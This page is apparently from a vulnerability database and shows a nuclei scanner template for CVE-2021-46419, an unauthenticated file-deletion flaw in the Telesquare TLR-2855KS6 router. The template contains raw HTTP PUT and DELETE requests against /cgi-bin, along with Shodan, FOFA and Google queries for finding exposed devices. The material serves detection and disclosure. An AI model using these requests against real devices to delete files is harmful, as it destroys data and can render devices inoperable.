Lucene search
K

Telesquare TLR-2855KS6 - Arbitrary File Deletion

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Telesquare TLR-2855KS6 - Unauthorized File Deletion via DELETE method, allowing deletion of system files and scripts

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Telesquare TLR-2855KS6 - Arbitrary File Deletion Vulnerability
11 Apr 202200:00
zdt
ATTACKERKB
CVE-2021-46419
7 Apr 202212:15
attackerkb
Circl
CVE-2021-46419
7 Apr 202216:49
circl
CNNVD
Telesquare TLR-2855KS6 安全漏洞
7 Apr 202200:00
cnnvd
CVE
CVE-2021-46419
7 Apr 202211:28
cve
Cvelist
CVE-2021-46419
7 Apr 202211:28
cvelist
Exploit DB
Telesquare TLR-2855KS6 - Arbitrary File Deletion
11 Apr 202200:00
exploitdb
NVD
CVE-2021-46419
7 Apr 202212:15
nvd
Packet Storm
Telesquare TLR-2855KS6 Arbitrary File Deletion
11 Apr 202200:00
packetstorm
Prion
Arbitrary file deletion
7 Apr 202212:15
prion
Rows per page
id: CVE-2021-46419

info:
  name: Telesquare TLR-2855KS6 - Arbitrary File Deletion
  author: DhiyaneshDK
  severity: critical
  description: |
    An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.
  impact: |
    Unauthenticated attackers can delete arbitrary files from the Telesquare TLR-2855KS6 device using HTTP DELETE requests, potentially destroying system files and rendering the device inoperable.
  remediation: |
    Apply firmware updates provided by Telesquare or restrict HTTP DELETE access to the device.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2021-46419
    - http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-46419
    epss-score: 0.71384
    epss-percentile: 0.99336
    cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: telesquare
    product: "tlr-2855ks6_firmware"
    shodan-query:
      - "title:\"Login to TLR-2855KS6\""
      - http.title:"login to tlr-2855ks6"
    fofa-query:
      - "product==\"TELESQUARE-TLR-2855KS6\""
      - title="login to tlr-2855ks6"
      - product=="telesquare-tlr-2855ks6"
    google-query: "intitle:\"login to tlr-2855ks6\""
  tags: packetstorm,cve,cve2021,telesquare,intrusive,vuln
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        PUT /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        DNT: 1

        {{randstr}}
      - |
        DELETE /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        DNT: 1

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 201 && status_code_2 == 204'
          - 'contains(server_1, "lighttpd")'
        condition: and
# digest: 4a0a00473045022100b6296abba89f2e3cb7bd0b96bfc7c078ffbf28be9fbe7b7882cf06abf1c456080220793beabd0a0e3d358f8222127043f341e8b9f4ff27d60afa3a9913c27a91e1c2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.4
CVSS 3.19.1
EPSS0.71384
33